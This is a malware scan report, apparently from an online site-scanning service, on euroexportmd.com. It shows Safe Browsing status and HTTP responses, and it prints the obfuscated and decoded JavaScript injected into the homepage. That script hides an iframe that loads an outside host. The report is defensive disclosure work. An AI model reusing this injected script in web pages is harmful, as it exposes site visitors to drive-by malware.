Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=euroexportmd.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://euroexportmd.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=600 Connection: close Date: Mon, 12 Jan 2015 17:49:53 GMT Location: http://www.euroexportmd.com/ Server: Apache Content-Length: 302 Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 12 Jan 2015 17:59:53 GMT | clean |
http://www.euroexportmd.com/ | 200 OK Content-Length: 2807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://rjytkixbfjxkk.myfw.us/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://rjytkixbfjxkk.myfw.us/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10'); <iframe src='http://rjytkixbfjxkk.myfw.us/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://www.euroexportmd.com/test404page.js | 404 Not Found Content-Length: 282 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: euroexportmd.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=600
Connection: close
Date: Mon, 12 Jan 2015 17:49:53 GMT
Location: http://www.euroexportmd.com/
Server: Apache
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 12 Jan 2015 17:59:53 GMT
...302 bytes of data.
GET / HTTP/1.1
Host: euroexportmd.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=600
Connection: close
Date: Mon, 12 Jan 2015 17:49:53 GMT
Location: http://www.euroexportmd.com/
Server: Apache
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 12 Jan 2015 17:59:53 GMT
...302 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: euroexportmd.com
Referer: http://www.google.com/search?q=euroexportmd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: euroexportmd.com
Referer: http://www.google.com/search?q=euroexportmd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.